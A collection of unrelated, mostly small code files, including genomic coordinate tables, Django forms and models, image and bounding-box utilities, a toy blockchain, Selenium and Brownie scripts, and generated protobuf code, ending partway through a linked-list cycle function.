'Vs45':569515,
'Vs46':589685,
'Vs47':629218,
'Vs48':663090,
'Vs49':699982,
'Vs50':713632,
'Vs51':729148,
'Vs52':734143,
'Vs53':753062,
'Vs54':774940,
'Vs55':782905,
'Vs186':327035,
'Vs187':267149,
'Vs188':262262
}
#chr10
Vext_iglv={
'Vs0':499988,
'Vs2':626324,
'Vs3':636158,
'Vs4':647190,
'Vs5':687902,
'Vs6':715146,
'Vs7':880405,
'Vs8':918683,
'Vs9':928009,
'Vs10':933349,
'Vs11':949609,
'Vs12':956355,
'Vs13':960994,
'Vs14':970235,
'Vs15':979760,
'Vs16':988832,
'Vs17':996455,
'Vs18':1001031,
'Vs19':1014418,
'Vs20':1036509,
'Vs21':1041518,
'Vs22':1047342,
'Vs23':1070108,
'Vs24':1074656,
'Vs25':1139987,
'Vs26':1376639,
'Vs27':1381117,
'Vs28':1387609,
'Vs29':1405133,
'Vs30':1412774,
'Vs31':1431853,
'Vs32':1440262,
'Vs33':1452426,
'Vs34':1476245,
'Vs35':1499973,
'Vs36':1510598
}
#chr3
Vext_trbv={
'Vs56':442592,
'Vs57':449559,
'Vs58':454203,
'Vs59':462425,
'Vs60':470019,
'Vs61':478529,
'Vs62':485047,
'Vs63':489384,
'Vs64':500170,
'Vs65':508102,
'Vs66':522890,
'Vs67':526323,
'Vs68':538096,
'Vs69':567357,
'Vs70':575084,
'Vs71':583391,
'Vs72':594749,
'Vs73':607340,
'Vs74':616497,
'Vs75':633607,
'Vs76':637840,
'Vs77':645856,
'Vs78':673129,
'Vs79':683763,
'Vs80':694695,
'Vs81':699763,
'Vs82':705793,
'Vs83':731651,
'Vs84':739086,
'Vs85':751477,
'Vs86':763018,
'Vs87':770506,
'Vs88':781233,
'Vs89':788055,
'Vs90':795359,
'Vs91':806398,
'Vs92':811999,
'Vs93':815267,
'Vs94':830609,
'Vs95':837595,
'Vs96':843249,
'Vs97':849127,
'Vs98':863754,
'Vs99':866976,
'Vs100':874916,
'Vs101':885261,
'Vs102':894238,
'Vs103':906242,
'Vs104':914071,
'Vs105':954970,
'Vs106':960303,
'Vs107':974120,
'Vs189':1150891
}
# -----------------------------------
# New Program:
RF_ighv= {
'V165RF':(1480, 1787), # scaffold1099548049584
'V166RF':(38587, 38894),
'V167RF':(48224, 48531),
'V168RF':(55679, 55992),
'V169RF':(64965, 65272),
'V170RF':(97732, 98036),
'V171RF':(146615, 146925),
'V172RF':(167535, 167842),
'V173RF':(175853, 176160),
'V174RF':(187204, 187517),
'V175RF':(203920, 204227),
'V176RF':(290354, 290661),
'V177RF':(294316, 294626),
'V178RF':(331174, 331484),
'V179RF':(439321, 439628),
'V180RF':(477119, 477426),
'V181RF':(491715, 492025),
'V182RF':(520614, 520924),
'V183RF':(565603, 565913),
'V184RF':(593372, 593679),
'V185RF':(601140, 601453),
'V186RF':(604649, 604959),
'V187RF':(613002, 613309),
'V188RF':(654685, 654992),
'V189RF':(661965, 662272),
'V190RF':(700539, 700852),
'V191RF':(716253, 716560),
'V192RF':(725594, 725898),
'V193RF':(742215, 742522),
'V194RF':(759508, 759812),
'V196RF':(224, 537), # scaffold1099214757507
'V202RF':(92, 399) # scaffold1099214148171
}
#Chr10
RF_iglv= {
'V0RF':(499986, 500293),
'V1RF':(603028, 603353),
'V2RF':(626321, 626628),
'V3RF':(636156, 636463),
'V4RF':(647188, 647498),
'V5RF':(687899, 688209),
'V6RF':(707274, 707563),
'V7RF':(715143, 715453),
'V8RF':(735210, 735538),
'V9RF':(880402, 880712),
'V10RF':(918680, 918987),
'V11RF':(923194, 923519),
'V12RF':(928007, 928314),
'V13RF':(933346, 933653),
'V14RF':(949606, 949910),
'V15RF':(956352, 956662),
'V16RF':(960992, 961299),
'V17RF':(970232, 970539),
'V18RF':(979758, 980065),
'V19RF':(988829, 989136),
'V20RF':(996452, 996762),
'V21RF':(1001029, 1001336),
'V22RF':(1014415, 1014722),
'V23RF':(1036507, 1036814),
'V24RF':(1041515, 1041822),
'V25RF':(1047339, 1047646),
'V26RF':(1070105, 1070415),
'V27RF':(1074654, 1074961),
'V28RF':(1112608, 1112930),
'V29RF':(1376637, 1376938),
'V30RF':(1381115, 1381416),
'V31RF':(1387607, 1387908),
'V32RF':(1396836, 1397131),
'V33RF':(1405131, 1405432),
'V34RF':(1412772, 1413073),
'V35RF':(1431851, 1432152),
'V36RF':(1440260, 1440561),
'V37RF':(1452424, 1452725),
'V38RF':(1476242, 1476552),
'V39RF':(1499971, 1500272),
'V40RF':(1510596, 1510897)
}
#Chr13
RF_igkv= {
'V41RF':(377091, 377404),
'V42RF':(429919, 430217),
'V43RF':(448936, 449237),
'V44RF':(466827, 467140),
'V45RF':(489129, 489445),
'V46RF':(497323, 497627),
'V47RF':(515103, 515416),
'V48RF':(520017, 520330),
'V49RF':(523451, 523764),
'V50RF':(528118, 528416),
'V51RF':(536209, 536522),
'V52RF':(561291, 561604),
'V53RF':(569513, 569811),
'V54RF':(589684, 589985),
'V55RF':(629216, 629514),
'V56RF':(663087, 663385),
'V57RF':(699980, 700296),
'V58RF':(713630, 713928),
'V59RF':(729146, 729459),
'V60RF':(734141, 734454),
'V61RF':(753060, 753373),
'V62RF':(774938, 775236),
'V63RF':(782904, 783217),
'V197RF':(733293, 733594),
'V198RF':(738179, 738495)
}
#Chr3
RF_trbv= {
'V64RF':(442590, 442888),
'V65RF':(449557, 449852),
'V66RF':(454201, 454496),
'V67RF':(462423, 462721),
'V68RF':(470017, 470312),
'V69RF':(478527, 478825),
'V70RF':(485045, 485340),
'V71RF':(489382, 489677),
'V72RF':(500169, 500464),
'V73RF':(508100, 508395),
'V74RF':(522888, 523183),
'V75RF':(526321, 526616),
'V76RF':(538094, 538389),
'V77RF':(567355, 567653),
'V78RF':(572397, 572695),
'V79RF':(575083, 575378),
'V80RF':(583389, 583684),
'V81RF':(594747, 595045),
'V82RF':(607338, 607633),
'V83RF':(616495, 616793),
'V84RF':(633605, 633900),
'V85RF':(637838, 638136),
'V86RF':(645855, 646150),
'V87RF':(651145, 651464),
'V88RF':(657297, 657595),
'V89RF':(673127, 673425),
'V90RF':(683762, 684057),
'V91RF':(694693, 694991),
'V92RF':(699762, 700057),
'V93RF':(705812, 706101),
'V94RF':(731650, 731945),
'V95RF':(739090, 739376),
'V96RF':(751476, 751771),
'V97RF':(763016, 763314),
'V98RF':(770505, 770800),
'V99RF':(781231, 781529),
'V100RF':(788053, 788348),
'V101RF':(795357, 795652),
'V102RF':(806396, 806694),
'V103RF':(811997, 812295),
'V104RF':(815265, 815563),
'V105RF':(830607, 830905),
'V106RF':(837593, 837891),
'V107RF':(843247, 843542),
'V108RF':(849125, 849423),
'V109RF':(863753, 864048),
'V110RF':(866974, 867269),
'V111RF':(874917, 875221),
'V112RF':(885259, 885554),
'V113RF':(894236, 894534),
'V114RF':(906239, 906537),
'V115RF':(914069, 914364),
'V116RF':(954968, 955263),
'V117RF':(960301, 960596),
'V118RF':(974118, 974419),
'V199RF':(213152, 213444)
}
#Chr7
RF_trav= {
'V119RF':(376249, 376532),
'V120RF':(401348, 401649),
'V121RF':(488320, 488615),
'V122RF':(500476, 500762),
'V123RF':(519212, 519501),
'V124RF':(529172, 529458),
'V125RF':(565497, 565789),
'V126RF':(578732, 579024),
'V127RF':(591554, 591843),
'V128RF':(596993, 597288),
'V129RF':(617954, 618243),
'V130RF':(640532, 640818),
'V131RF':(652596, 652891),
'V132RF':(666452, 666744),
'V133RF':(672397, 672698),
'V134RF':(690719, 691011),
'V135RF':(728127, 728425),
'V136RF':(739934, 740217),
'V137RF':(749403, 749689),
'V138RF':(761626, 761915),
'V139RF':(764845, 765146),
'V140RF':(800534, 800820),
'V141RF':(810884, 811176),
'V142RF':(839335, 839630),
'V143RF':(872392, 872681),
'V144RF':(880635, 880933),
'V145RF':(891540, 891829),
'V147RF':(955188, 955477),
'V148RF':(959650, 959939),
'V149RF':(967088, 967386),
'V150RF':(978092, 978390),
'V151RF':(987208, 987503),
'V152RF':(1004598, 1004881),
'V153RF':(1018152, 1018459),
'V154RF':(1023919, 1024205),
'V155RF':(1047022, 1047311),
'V156RF':(1051889, 1052175),
'V157RF':(1064813, 1065099),
'V158RF':(1069500, 1069789),
'V159RF':(1107467, 1107768),
'V160RF':(1116975, 1117273),
'V161RF':(1140579, 1140865),
'V162RF':(1151526, 1151815),
'V163RF':(1157941, 1158242),
'V195RF':(1498, 1793), #scaffold1099214732309
'V201RF':(2885, 3195) #scaffold1099214128018
}
start_chr10=65303593
start_chr13=88936957
start_chr13=112709235
start_chr7=83967455
start_chr3=179305555
|
991,656 | 1049df00d76d7bd45efbfc8f1f66b897caadb18b | from django import forms
class per_day_form(forms.Form):
#sets different field for per_day_form
amount = forms.IntegerField(max_value=200, min_value=0)
due_date_month = forms.ChoiceField(choices=[(x, x) for x in range(1, 13)], label='Due Date')
due_date_day = forms.ChoiceField(choices=[(x, x) for x in range(1, 32)], label='/ ', label_suffix="")
due_date_year = forms.ChoiceField(choices=[(x, x) for x in range(2018, 2051)], label='/ ', label_suffix="")
# gets clean data from field user inputs
def clean(self):
cleaned_data = super(per_day_form, self).clean()
amount = cleaned_data.get('amount')
due_date_month = cleaned_data.get('due_date_month')
due_date_day = cleaned_data.get('due_date_day')
due_date_year = cleaned_data.get('due_date_year')
# raise error if user did not fill in one or more fields
if not due_date_month and not due_date_day and not due_date_year and not amount:
raise forms.ValidationError('Please enter all fields')
class grade_recieved_form(forms.Form):
#sets different field for grade_recieved_form
grade = forms.IntegerField(label='Percent', max_value=100, min_value=0)
points_possible = forms.IntegerField(label='Points Possible', max_value=200, min_value=0)
# gets clean data from field user inputs
def clean(self):
cleaned_data = super(grade_recieved_form, self).clean()
grade = cleaned_data.get('grade')
points_possible = cleaned_data.get('points_possible')
# raise error if user did not fill in one or more fields
if not points_possible and not grade:
raise forms.ValidationError('Please enter all fields')
|
991,657 | ab8938a13104cc34194bd50fb5ff1ec012ee2f79 | import numpy as np
from PIL import Image, ImageOps, ImageDraw
__all__ = ['convert_bboxes_to_float',
'convert_bboxes_to_int',
'bboxes_filter_center',
'crop_bboxes',
'resize_bboxes',
'pad_image',
'crop_image',
'draw_boxes',
'intersection',
'iou']
def convert_bboxes_to_float(bboxes, image_shape):
'''
:param bboxes: int type boxes [ymin, xmin, ymax, ymin]
:param image_shape: [height, width]
:return: float bboxes
'''
bboxes = [bboxes[..., 0] / image_shape[0],
bboxes[..., 1] / image_shape[1],
bboxes[..., 2] / image_shape[0],
bboxes[..., 3] / image_shape[1]]
bboxes = np.stack(bboxes,axis=-1)
return bboxes
def convert_bboxes_to_int(bboxes, image_shape):
bboxes = [bboxes[..., 0] * image_shape[0],
bboxes[..., 1] * image_shape[1],
bboxes[..., 2] * image_shape[0],
bboxes[..., 3] * image_shape[1]]
bboxes = np.stack(bboxes, axis=-1)
return bboxes
def bboxes_filter_center(bboxes, image_shape):
"""Filter out bounding boxes whose center are not in
the rectangle [0, 0, 1, 1] + margins. The margin Tensor
can be used to enforce or loosen this condition.
:param bboxes: int format boxes
:param image_shape: [h,w]
Return:
mask: a logical numpy array
"""
cy = (bboxes[..., 0] + bboxes[..., 2]) / 2.
cx = (bboxes[..., 1] + bboxes[..., 3]) / 2.
mask = cy > 0
mask = np.logical_and(mask, cx > 0)
mask = np.logical_and(mask, cy < image_shape[0])
mask = np.logical_and(mask, cx < image_shape[1])
return mask
def crop_bboxes(bbox_ref, bboxes):
"""Transform bounding boxes based on a reference bounding box,
Useful for updating a collection of boxes after cropping an image.
:param bbox_ref, bboxes: int format boxes [ymin, xmin, ymax, xmax]
"""
v = np.stack([bbox_ref[0], bbox_ref[1], bbox_ref[0], bbox_ref[1]])
bboxes = bboxes - v
return bboxes
def resize_bboxes(ratios, bboxes):
"""calibrate the bboxes after the image was resized.
:param ratios: (ratio_h, ratio_w)
:param bboxes: int format bboxes
:return: int format bboxes
"""
ymin = bboxes[..., 0] * ratios[0]
xmin = bboxes[..., 1] * ratios[1]
ymax = bboxes[..., 2] * ratios[0]
xmax = bboxes[..., 3] * ratios[1]
bboxes = np.stack([ymin, xmin, ymax, xmax], axis=-1)
return bboxes
def pad_image(img, boxes, pad_shape):
'''
pad the image to pad_shape.
if the a side of img is bigger than pad_shape, then do nothing on the side.
:param img: Pillow Image
:param boxes: int boxes
:param pad_shape: (height, width)
:return: (padded_img, padded_boxes)
'''
img_w, img_h = img.shape
if img_h<pad_shape[0] or img_w<pad_shape[1]:
delta_h = max(0, pad_shape[0]-img_h)
delta_w = max(0, pad_shape[1]-img_w)
padding = (delta_h // 2, delta_w // 2, delta_h - (delta_h // 2), delta_w - (delta_w // 2))
padded_img = ImageOps.expand(img, padding)
boxes[0] += padding[0]
boxes[1] += padding[1]
return padded_img, boxes
else:
return img, boxes
def crop_image(img, crop_box, boxes):
'''crop the image
:param img: Pillow Image
:param crop_box: int [ymin, xmin, ymax, xmax]
:param boxes: int
:return: (cropped_img, cropeed_boxes)
'''
cropped_img = img.crop([crop_box[1],
crop_box[0],
crop_box[3],
crop_box[2]])
cropped_boxes = crop_bboxes(crop_box, boxes)
return cropped_img, cropped_boxes
def draw_boxes(img, boxes, color='green', width=3):
'''
draw the boxes in the img
:param img: Pillow Image or numpy
:param boxes: boxes, [[ymax, xmax, ymin, xmin]...]
:param color: color
:return: Image drawed boxes
'''
if isinstance(img, np.ndarray):
img = Image.fromarray(img.astype(np.uint8), mode='RGB')
elif not isinstance(img, Image.Image):
raise ValueError("image must be a Image or ndarray.")
draw = ImageDraw.Draw(img)
for box in boxes:
draw.rectangle([box[1], box[0], box[3], box[2]], outline=color, width=width)
return img
def intersection(boxes1, boxes2):
"""
:param boxes1: numpy.ndarray [num, 4], each column is ymin, xmin, ymax, xmax
:param boxes2: same as boxes1
:return: numpy.ndarray [num1, num2]
"""
assert(boxes1.shape[1]==4 and boxes2.shape[1]==4)
ymin1, xmin1, ymax1, xmax1 = np.split(boxes1, 4, axis=1)
ymin2, xmin2, ymax2, xmax2 = np.split(boxes2, 4, axis=1)
all_pairs_min_ymax = np.minimum(ymax1, ymax2.reshape(-1))
all_pairs_max_ymin = np.maximum(ymin1, ymin2.reshape(-1))
intersect_heights = np.maximum(0.0, all_pairs_min_ymax - all_pairs_max_ymin)
all_pairs_min_xmax = np.minimum(xmax1, xmax2.reshape(-1))
all_pairs_max_xmin = np.maximum(xmin1, xmin2.reshape(-1))
intersect_widths = np.maximum(0.0, all_pairs_min_xmax - all_pairs_max_xmin)
return intersect_heights * intersect_widths
def iou(boxes1, boxes2):
"""
:param boxes1: numpy.ndarray [num, 4], each column is ymin, xmin, ymax, xmax
:param boxes2: same as boxes1
:return: numpy.ndarray [num1, num2]
"""
intersections = intersection(boxes1, boxes2)
areas1 = (boxes1[:,2]-boxes1[:,0]) * (boxes1[:,3]-boxes1[:,1])
areas2 = (boxes2[:,2]-boxes2[:,0]) * (boxes2[:,3]-boxes2[:,1])
unions = areas1.reshape([-1, 1]) + areas2.reshape([1, -1]) - intersections
ious = intersections / unions
return ious
|
991,658 | 3bf21cb27874d498085048fbf33b3d3125522ecd | from math import pi
E = 10e9 # Pa
I = 1.25e-5 # m**4
L = 3 # m
# n = 1,2,3,...
def column_eigenvalue(n):
return n*pi/L
# n = 1,2,3,...
def buckling_load(n):
return n**2 * pi**2 * E * I / L**2
for n in range(1,9):
print("%d %11.4f %11.3f" % (n, column_eigenvalue(n), buckling_load(n)/1e3))
|
991,659 | 63c9b8e09abe223dba258cc0e6e4c6a48af100ac | from django.shortcuts import render
import datetime
import hashlib
import json
from django.http import JsonResponse
class Blockchain:
def __init__(self):
self.chain = []
self.create_block(nonce = 1, previous_hash = '0')
def create_block(self, nonce, previous_hash):
block = {'index': len(self.chain) + 1, \
'timestamp': str(datetime.datetime.now()), \
'nonce': nonce, \
'previous_hash': previous_hash }
self.chain.append(block)
return block
def get_previous_block(self):
return self.chain[-1]
def proof_of_work(self, previous_nonce):
new_nonce = 1
check_nonce = False
while check_nonce is False:
hash_operation = hashlib.sha256(str(new_nonce**2 - previous_nonce**2).encode()).hexdigest()
if hash_operation[:4] == '0000':
check_nonce = True
else:
new_nonce += 1
return new_nonce
def hash(self, block):
encoded_block = json.dumps(block, sort_keys = True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def is_chain_valid(self, chain):
previous_block = chain[0]
block_index = 1
while block_index < len(chain):
block = chain[block_index]
if block['previous_hash'] != self.hash(previous_block):
return False
previous_nonce = previous_block['nonce']
nonce = block['nonce']
hash_operation = hashlib.sha256(str(nonce**2 - previous_nonce**2).encode()).hexdigest()
if hash_operation[:4] != '0000':
return False
previous_block = block
block_index += 1
return True
# Create BlockChain
Blockchain = Blockchain()
|
991,660 | 7a8b784a807bc977d3ca2876d7d98ec3fae37c66 | """gamershub URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.views.static import serve
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from paypal.standard.ipn import urls as paypal_urls
from gamershub_store import views as gamershub_paypal_views
from gamershub_products import views as gamershub_product_views
from home import views as home_views
from settings.dev import MEDIA_ROOT, STATIC_ROOT
urlpatterns = [
# add the url to access the admin panel
url(r'^admin/', include(admin.site.urls), name='admin'),
# accounts app urls
url(r'^accounts/', include('accounts.urls')),
# home app urls
url(r'^$', home_views.get_index, name='home'),
# here we want to add the urls from gamersblog app
url(r'^blog/', include('gamersblog.urls')),
# gamershub store urls
url(r'^AqJP9tJZrcgZgWAdj92qKmHK3/', include(paypal_urls)),
url(r'^paypal-return', gamershub_paypal_views.paypal_return),
url(r'^paypal-cancel', gamershub_paypal_views.paypal_cancel),
# gamershub products urls
url(r'^products/$', gamershub_product_views.products_list, name='products'),
# Media Root urls
url(r'^media/(?P<path>.*)$', serve, {'document_root': MEDIA_ROOT}),
# Static Root urls
url(r'^static/(?P<path>.*)$', serve, {'document_root': STATIC_ROOT,}),
]
# debug settings to use for static files
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
|
991,661 | e37854f3f063424968bf1671501101272df954e0 | # Done by Carlos Amaral (2021/01/02)
import random
def guess(x):
random_number = random.randint(1, x)
guess = 0
while guess != random_number:
print('Press 12 to quit at any time')
guess = int(input(f'Please, guess a number between 1 and {x}: '))
if guess == 12:
break
elif guess < random_number:
print('Too low!')
elif guess > random_number:
print('Too high!')
else:
print(f'Correct, the random_number is {random_number}!! Congratulations :)')
guess(10)
|
991,662 | e7016e0c3f8320b590f2c112b034508c8044f4fb | #!/usr/bin/python3
"""
script that lists all states from the database hbtn_0e_0_usa
"""
import MySQLdb
import sys
if __name__ == '__main__':
miConexion = MySQLdb.connect(host='localhost', user=sys.argv[1],
passwd=sys.argv[2], db=sys.argv[3])
cur = miConexion.cursor()
cur.execute("SELECT * FROM states ORDER BY states.id ASC")
for name, id in cur.fetchall():
print((name, (id)))
cur.close()
miConexion.close()
|
991,663 | 7ff44d3e91b665f636aec6ff96bd0d236340d20a | from django.db import models
import re
from django.utils.timezone import now
# Create your models here.
class UserManager(models.Manager):
def basic_validation(self, postData):
errors = {}
EMAIL_REGEX = re.compile(
r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
if len(postData['name']) < 2:
errors['name'] = 'Name should be at least 2 characters'
if not EMAIL_REGEX.match(postData['email']):
errors['email'] = ("Invalid email address!")
if len(postData['password']) < 8:
errors['password'] = 'Password should be at least 8 characters'
if postData['password'] != postData['confirm_pw']:
errors['pw'] = 'Password and Confirm Password do not match'
return errors
class ExpenseManager(models.Manager):
def basic_validation(self, postData):
errors = {}
if len(postData['category']) == 0:
errors['category'] = 'Please enter a category'
if len(postData['amount']) == 0:
errors['amount'] = 'Please enter an amount'
if len(postData['expense_date']) == 0:
errors['expense_date'] = 'Please enter an date'
return errors
class IncomeManager(models.Manager):
def basic_validation(self, postData):
errors = {}
if len(postData['category']) == 0:
errors['category'] = 'Please enter a category'
if len(postData['amount']) == 0:
errors['amount'] = 'Please enter an amount'
if len(postData['income_date']) == 0:
errors['income_date'] = 'Please enter an date'
return errors
class CategoryManager(models.Manager):
def basic_validation(self, postData):
errors = {}
if len(postData['category_name']) == 0:
errors['category_name'] = 'Please enter a category name'
return errors
class User(models.Model):
name = models.CharField(max_length=255)
email = models.CharField(max_length=255)
password = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = UserManager()
class Expense(models.Model):
amount = models.FloatField()
date = models.DateField(default=now)
description = models.TextField()
owner = models.ForeignKey(
User, related_name="expense_by_user", on_delete=models.CASCADE)
category = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = ExpenseManager()
def __str__(self):
return self.category
class Meta:
ordering = ['-date']
class Income(models.Model):
amount = models.FloatField()
date = models.DateField(default=now)
description = models.TextField()
owner = models.ForeignKey(
User, related_name="income_by_user", on_delete=models.CASCADE)
category = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = IncomeManager()
def __str__(self):
return self.category
class Meta:
ordering = ['-date']
class ExpenseCategory(models.Model):
name = models.CharField(max_length=255)
owner = models.ForeignKey(
User, related_name="expense_category_by_user", on_delete=models.CASCADE)
objects = CategoryManager()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Categories'
def __str__(self):
return self.name
class IncomeCategory(models.Model):
name = models.CharField(max_length=255)
owner = models.ForeignKey(
User, related_name="income_category_by_user", on_delete=models.CASCADE)
objects = CategoryManager()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Categories'
def __str__(self):
return self.name
|
991,664 | f8bf4a10fee73e7dadd79b324bf870569561158a | def f(s):
if s == "":
return [""]
result = []
for p in f(s[1:]):
for i in range(len(p) + 1):
# p_i = s[0] + p[i:]
# p_i = p[:i-1] + s[i] + p[i+1:]
# p_i = p[:i] + s[0] + p[i:]
p_i = p[:i] + s[0]
result.append(p_i)
return result
if __name__ == '__main__':
print (len(f('abcde'))) |
991,665 | 7591cf50848822ad59098d06da02d2cd7a6a2bcd | a, b = map(int, input().split())
ans = "Yay!" if a <= 8 and b <= 8 else ":("
print(ans)
|
991,666 | acbebf2546d62ad55423bef0845a6223e1bd7ea8 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: playback.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import librespot.protobuffers.context_track_pb2 as context__track__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='playback.proto',
package='spotify.player.proto.transfer',
syntax='proto2',
serialized_options=b'\n\024com.spotify.transferH\002',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0eplayback.proto\x12\x1dspotify.player.proto.transfer\x1a\x13\x63ontext_track.proto\"\xa5\x01\n\x08Playback\x12\x11\n\ttimestamp\x18\x01 \x01(\x03\x12 \n\x18position_as_of_timestamp\x18\x02 \x01(\x05\x12\x16\n\x0eplayback_speed\x18\x03 \x01(\x01\x12\x11\n\tis_paused\x18\x04 \x01(\x08\x12\x39\n\rcurrent_track\x18\x05 \x01(\x0b\x32\".spotify.player.proto.ContextTrackB\x18\n\x14\x63om.spotify.transferH\x02'
,
dependencies=[context__track__pb2.DESCRIPTOR,])
_PLAYBACK = _descriptor.Descriptor(
name='Playback',
full_name='spotify.player.proto.transfer.Playback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='timestamp', full_name='spotify.player.proto.transfer.Playback.timestamp', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='position_as_of_timestamp', full_name='spotify.player.proto.transfer.Playback.position_as_of_timestamp', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='playback_speed', full_name='spotify.player.proto.transfer.Playback.playback_speed', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_paused', full_name='spotify.player.proto.transfer.Playback.is_paused', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current_track', full_name='spotify.player.proto.transfer.Playback.current_track', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=71,
serialized_end=236,
)
_PLAYBACK.fields_by_name['current_track'].message_type = context__track__pb2._CONTEXTTRACK
DESCRIPTOR.message_types_by_name['Playback'] = _PLAYBACK
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Playback = _reflection.GeneratedProtocolMessageType('Playback', (_message.Message,), {
'DESCRIPTOR' : _PLAYBACK,
'__module__' : 'playback_pb2'
# @@protoc_insertion_point(class_scope:spotify.player.proto.transfer.Playback)
})
_sym_db.RegisterMessage(Playback)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
991,667 | 9c4e7499b77346b6248df0779c79fe38e8863dd9 | from brownie import accounts, ForceTransfer, chain, web3
import brownie
import pytest
def main():
address_empty_contract = '0xEC60d52feBcB327d7a3887920Abe8175986715e7'
caller = accounts.load('accountDeploy01')
force_transfer = caller.deploy(
ForceTransfer,
address_empty_contract,
publish_source=True
)
# this call not run on rinkeby server -- dont know why, it get stuck for an hour.
web3.eth.sendTransaction(
{"from": caller.address, "to": force_transfer.address, "value": 1})
force_transfer.selfDestruct({"from": caller.address})
|
991,668 | 596a2a3834dc9983f71e436e150caf898d266768 |
import Image
import ImageDraw
import ImageFont
def draw_object(position, sequence):
counter = 0
for j in range(20):
for i in range(4 - j % 2):
if j % 2 == 1:
translate = SIZE / 2
else:
translate = 0
draw.ellipse((SIZE * i + translate + position[0],SIZE * j + position[1],SIZE * (i + 1) + translate + position[0],SIZE * (j + 1) + position[1]), None, (0,0,0))
draw.text((SIZE * i + translate + TRANSX + position[0], SIZE * j + TRANSY + position[1]), sequence[counter], (0,0,0), sans16)
counter = counter + 1
#-----------------------------------
fontPath = "/usr/share/fonts/truetype/liberation/LiberationSerif-Regular.ttf"
sans16 = ImageFont.truetype ( fontPath, 16 )
im = Image.new('RGB', (600,600), (255, 255, 255))
draw = ImageDraw.Draw(im)
SIZE = 20
TRANSX = 5
TRANSY = 1
sequence = "ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
draw_object((0,0), sequence)
draw_object((120,20), sequence)
draw_object((240,10), sequence)
draw_object((360,30), sequence)
draw_object((480,0), sequence)
im.show()
im.save('test.png', 'PNG')
|
991,669 | 0c5c18e3e92843f729103d880bbf967ebab5ee4d | '''
Agenda:
1.)Print how many links present in a page
2.)Print all link in console using loop(Extract all link)
3.)Clicking on the link
'''
from selenium import webdriver
from selenium.webdriver.common.by import By
driver=webdriver.Chrome(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\chromedriver.exe')
# driver=webdriver.Firefox(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\geckodriver.exe')
# driver=webdriver.Ie(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\IEDriverServer.exe')
# driver.get('https://fs2.formsite.com/meherpavan/form2/index.html')
driver.get('http://newtours.demoaut.com/')
driver.get('https://www.girmiti.com/')
links=driver.find_elements(By.TAG_NAME,'a')
# print("No. of links present:",len(links))
# for link in links:
# print(link.text)
#Clicking on the link
# driver.find_element(By.LINK_TEXT,'REGISTER').click()
driver.find_element(By.PARTIAL_LINK_TEXT,'R').click() |
991,670 | 5a75f674fa7972ff3cadc7731a2f45db8fbb2227 | from typing import *
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def detectCycle(self, head: ListNode) -> ListNode:
def getIntersect(head):
slow = head
fast = head
while fast and fast.next:
slow = slow.next
